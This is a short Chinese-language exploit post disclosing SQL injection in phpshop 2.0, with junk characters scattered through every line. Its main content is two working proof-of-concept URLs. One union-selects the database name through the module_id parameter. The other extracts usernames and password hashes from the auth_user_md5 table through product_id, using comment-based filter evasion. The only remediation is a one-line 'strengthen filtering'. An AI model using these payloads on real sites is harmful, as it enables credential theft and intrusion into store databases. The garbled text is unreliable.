标题 : phpshop 2.0 SQL Injection Vulnerability
/ p8 G+ R' A+ }& _6 b \4 y9 A3 f8 x
作者 : By onestree9 e4 J! q" \6 @8 K) y0 {% K& v
下载地址 : http://code.google.com/p/phpshop/downloads/list
5 K- N3 a% d/ v' K6 ]7 o测试地址: windows 7 / ubuntu% F& c1 A6 C3 Z
2 c& w: e. P5 M# L1 y' @! J5 F
! g9 K2 L* Q$ }' [2 u0 u; b0 V
SQLi p0c:5 t5 z& s' P0 V }$ D/ J- A1 G2 A
1 c5 e! s. x5 M: }# N2 {/ x==================" T9 \" p) q* [0 e+ V/ T) w
% [% G$ J0 t$ a% Q. nhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
3 [7 a$ q; t) u, ounion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --0 c# c1 E+ x* [9 G t. y
: T( D$ B6 V7 ~$ d
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--; H4 t8 a% _ F2 L
4 ^1 d2 H( |2 N) t" m5 T修复:
! h7 b: g9 g; ]/ y, F* b加强过滤
% k# H; _* V1 P. Q0 X; g0 S; N% @: [2 D# \% R r8 \. K
! j7 Y3 `4 T% r
|